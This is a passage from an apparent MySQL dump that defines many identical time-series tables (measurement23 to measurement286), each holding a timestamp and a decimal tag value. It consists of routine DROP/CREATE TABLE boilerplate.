`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement23`
--
DROP TABLE IF EXISTS `measurement23`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement23` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement230`
--
DROP TABLE IF EXISTS `measurement230`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement230` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement231`
--
DROP TABLE IF EXISTS `measurement231`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement231` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement232`
--
DROP TABLE IF EXISTS `measurement232`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement232` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement233`
--
DROP TABLE IF EXISTS `measurement233`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement233` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement234`
--
DROP TABLE IF EXISTS `measurement234`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement234` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement235`
--
DROP TABLE IF EXISTS `measurement235`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement235` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement236`
--
DROP TABLE IF EXISTS `measurement236`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement236` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement237`
--
DROP TABLE IF EXISTS `measurement237`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement237` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement238`
--
DROP TABLE IF EXISTS `measurement238`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement238` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement239`
--
DROP TABLE IF EXISTS `measurement239`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement239` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement24`
--
DROP TABLE IF EXISTS `measurement24`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement24` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement240`
--
DROP TABLE IF EXISTS `measurement240`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement240` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement241`
--
DROP TABLE IF EXISTS `measurement241`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement241` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement242`
--
DROP TABLE IF EXISTS `measurement242`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement242` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement243`
--
DROP TABLE IF EXISTS `measurement243`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement243` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement244`
--
DROP TABLE IF EXISTS `measurement244`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement244` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement245`
--
DROP TABLE IF EXISTS `measurement245`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement245` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement246`
--
DROP TABLE IF EXISTS `measurement246`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement246` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement247`
--
DROP TABLE IF EXISTS `measurement247`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement247` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement248`
--
DROP TABLE IF EXISTS `measurement248`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement248` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement249`
--
DROP TABLE IF EXISTS `measurement249`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement249` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement25`
--
DROP TABLE IF EXISTS `measurement25`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement25` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement250`
--
DROP TABLE IF EXISTS `measurement250`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement250` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement251`
--
DROP TABLE IF EXISTS `measurement251`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement251` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement252`
--
DROP TABLE IF EXISTS `measurement252`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement252` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement253`
--
DROP TABLE IF EXISTS `measurement253`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement253` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement254`
--
DROP TABLE IF EXISTS `measurement254`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement254` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement255`
--
DROP TABLE IF EXISTS `measurement255`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement255` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement256`
--
DROP TABLE IF EXISTS `measurement256`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement256` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement257`
--
DROP TABLE IF EXISTS `measurement257`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement257` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement258`
--
DROP TABLE IF EXISTS `measurement258`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement258` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement259`
--
DROP TABLE IF EXISTS `measurement259`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement259` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement26`
--
DROP TABLE IF EXISTS `measurement26`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement26` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement260`
--
DROP TABLE IF EXISTS `measurement260`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement260` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement261`
--
DROP TABLE IF EXISTS `measurement261`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement261` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement262`
--
DROP TABLE IF EXISTS `measurement262`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement262` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement263`
--
DROP TABLE IF EXISTS `measurement263`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement263` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement264`
--
DROP TABLE IF EXISTS `measurement264`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement264` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement265`
--
DROP TABLE IF EXISTS `measurement265`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement265` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement266`
--
DROP TABLE IF EXISTS `measurement266`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement266` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement267`
--
DROP TABLE IF EXISTS `measurement267`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement267` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement268`
--
DROP TABLE IF EXISTS `measurement268`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement268` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement269`
--
DROP TABLE IF EXISTS `measurement269`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement269` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement27`
--
DROP TABLE IF EXISTS `measurement27`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement27` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement270`
--
DROP TABLE IF EXISTS `measurement270`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement270` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement271`
--
DROP TABLE IF EXISTS `measurement271`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement271` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement272`
--
DROP TABLE IF EXISTS `measurement272`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement272` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement273`
--
DROP TABLE IF EXISTS `measurement273`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement273` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement274`
--
DROP TABLE IF EXISTS `measurement274`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement274` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement275`
--
DROP TABLE IF EXISTS `measurement275`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement275` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement276`
--
DROP TABLE IF EXISTS `measurement276`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement276` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement277`
--
DROP TABLE IF EXISTS `measurement277`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement277` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement278`
--
DROP TABLE IF EXISTS `measurement278`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement278` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement279`
--
DROP TABLE IF EXISTS `measurement279`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement279` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement28`
--
DROP TABLE IF EXISTS `measurement28`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement28` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement280`
--
DROP TABLE IF EXISTS `measurement280`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement280` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement281`
--
DROP TABLE IF EXISTS `measurement281`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement281` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement282`
--
DROP TABLE IF EXISTS `measurement282`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement282` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement283`
--
DROP TABLE IF EXISTS `measurement283`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement283` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement284`
--
DROP TABLE IF EXISTS `measurement284`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement284` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement285`
--
DROP TABLE IF EXISTS `measurement285`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement285` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement286`
--
DROP TABLE IF EXISTS `measurement286`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement286` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
